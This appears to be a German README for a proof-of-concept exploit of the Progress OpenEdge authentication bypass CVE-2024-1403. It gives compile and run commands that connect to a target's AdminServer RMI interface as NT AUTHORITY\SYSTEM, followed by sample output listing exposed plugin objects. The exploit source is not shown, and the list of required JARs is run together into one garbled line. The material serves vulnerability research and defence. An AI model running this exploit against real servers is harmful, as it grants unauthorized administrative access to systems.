
Progress OpenEdge Authentifizierungsumgehung
Ein Proof-of-Concept-Exploit für Progress OpenEdge CVE-2024-1403.
Weitere Details hier: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive
Sie müssen Ihre eigenen Versionen der folgenden JARs bereitstellen:
progress.jaroeauth-12.8.-.jarosmetrics.jarjuniper.jar$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java
Dieses Skript versucht, mit den Anmeldeinformationen NT AUTHORITY\SYSTEM eine Verbindung zur AdminServer-RMI-Schnittstelle herzustellen.
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.system.ISystemPlugIn
com.progress.agent.database.AgentPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.agent.database.IAgentPlugIn
com.progress.ubroker.tools.NSRemoteObject
com.progress.chimera.common.IChimeraHierarchy
com.progress.ubroker.tools.IYodaRMI
com.progress.ubroker.tools.IYodaSharedResources
com.progress.ubroker.tools.UBRemoteCommand
com.progress.chimera.common.IChimeraRemoteCommand
com.progress.juniper.admin.JAPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.juniper.admin.IJAPlugIn
com.progress.agent.smdatabase.SMPlugIn
com.progress.chimera.common.IChimeraRemoteObject
Diese Software wurde ausschließlich für akademische Forschungszwecke und für die Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dafür bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Nutzen Sie sie verantwortungsbewusst.